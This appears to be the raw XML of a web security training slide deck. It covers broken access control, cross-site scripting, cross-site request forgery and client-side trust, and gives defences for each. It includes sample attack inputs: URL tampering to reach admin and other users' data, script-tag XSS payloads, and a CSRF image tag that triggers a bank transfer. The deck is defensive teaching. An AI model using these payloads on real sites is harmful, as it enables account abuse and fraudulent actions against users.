              <a:t>require https (at least for the login / password transfer)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A8AF4E-BCCB-A0B9-18E9-971CEFDD8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371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A5: Broken Access Control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Missing access control for privileged actions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr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http://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site.com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200" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(authorization required)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://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site.com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2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admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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adduser?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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=X </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(accessible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… when accessing files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://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corp.com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2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internal/salaries.xls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://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me.net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2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No/One/Will/Guess/82534/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="22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me.jpg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty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Font typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… when accessing objects or data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="446087" lvl="1" indent="0">
              <a:buNone/>
              <a:defRPr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http://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shop.com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cart?id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200" b="1" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>413246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/>
              <a:t>(your cart)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://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shop.com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cart?id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2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123456  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(someone else’s cart ?)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add missing authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>don‘t rely on security by obscurity – it will not work!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A72510-3AF2-2FC2-6D1B-35C529ADB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841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A7: Cross-site scripting (XSS)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CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(XSS) vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an application takes user input and sends it </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to a Web browser without validation or encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker can execute JavaScript code in the victim's browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to hijack user sessions, deface web sites etc. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>– value returned immediately to the browser</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://site.com/search?q=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abc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty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  <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://site.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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alert("XSS");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>– value stored and reused (all visitors affected)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://site.com/add_comment?txt=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Great!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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http://site.com/add_comment?txt=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000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...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="20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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-622300">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="5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dirty="0"/>
              <a:t>Solution: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> user input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTML output</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty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C9AEA8-E6C5-937C-DCB0-451B6875C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59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Cross-site request forgery</a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> (CSRF) – a scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Alice logs in at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>, and forgets to log out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Alice then visits a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>evil.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> (or just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>webforums.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>), with:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr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img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21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http://bank.com/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="21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transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1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=1000000&amp;to_account=123456789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"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>Alice‘s browser wants to display the image, so sends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>a request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>, without Alice’s consent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>if Alice is still logged in, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> accepts the request and performs the action, transparently for Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(!)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>There is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no simple solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, but the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2100" dirty="0"/>
              <a:t>expire early user sessions, encourage users to log out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>use “double submit” cookies and/or secret hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>... or just use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF defenses provided by a web framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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E8467E-81C7-1143-CCC0-436D99317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661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5298975" y="504602"/>
            <a:ext cx="1865313" cy="6921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7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Client-server –  no trust</a:t>
            </a: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300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t trust your client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>HTTP response header fields like referrer, cookies etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>HTTP query string values (from hidden fields or explicit links)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>e.g.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&lt;input type=”hidden” name=”price” value=”299”&gt;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100" dirty="0"/>
              <a:t>in an online shop can (and will!) be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security on the client side doesn’t work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> (and cannot)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>don’t rely on the client to perform security checks (validation etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>e.g.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&lt;input type=”text”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maxlength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=”20”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t> is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>authentication should be done on the server side, not by the client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do all security-related checks on the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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FD1CA1-B862-904B-587C-EB6106CFC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313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6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6" grpId="0" animBg="1"/>
      <p:bldP spid="89092" grpId="0" build="p"/>
    </p:bldLst>
  </p:timing>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Modèle par défa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66615</TotalTime>
  <Words>1198</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>147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Modèle par défaut</vt:lpstr>
      <vt:lpstr>Typical web vulnerabilities</vt:lpstr>
      <vt:lpstr>Top Ten</vt:lpstr>
      <vt:lpstr>A1: Injection flaws</vt:lpstr>
      <vt:lpstr>Similar to A1: Malicious file execution</vt:lpstr>
      <vt:lpstr>A2: Broken authn &amp; session mgmt</vt:lpstr>
      <vt:lpstr>A5: Broken Access Control</vt:lpstr>
      <vt:lpstr>A7: Cross-site scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-site request forgery</vt:lpstr>
      <vt:lpstr>Client-server –  no trust</vt:lpstr>
      <vt:lpstr>Online web security challenges/courses</vt:lpstr>
      <vt:lpstr>Final words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WhiteHat training</dc:title>
  <dc:subject/>
  <dc:creator>Sebastian.Lopienski@cern.ch</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sebastian Lopienski</cp:lastModifiedBy>
  <cp:revision>1198</cp:revision>
  <cp:lastPrinted>2013-07-12T09:19:14Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2007-01-03T21:50:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-11T11:40:05Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>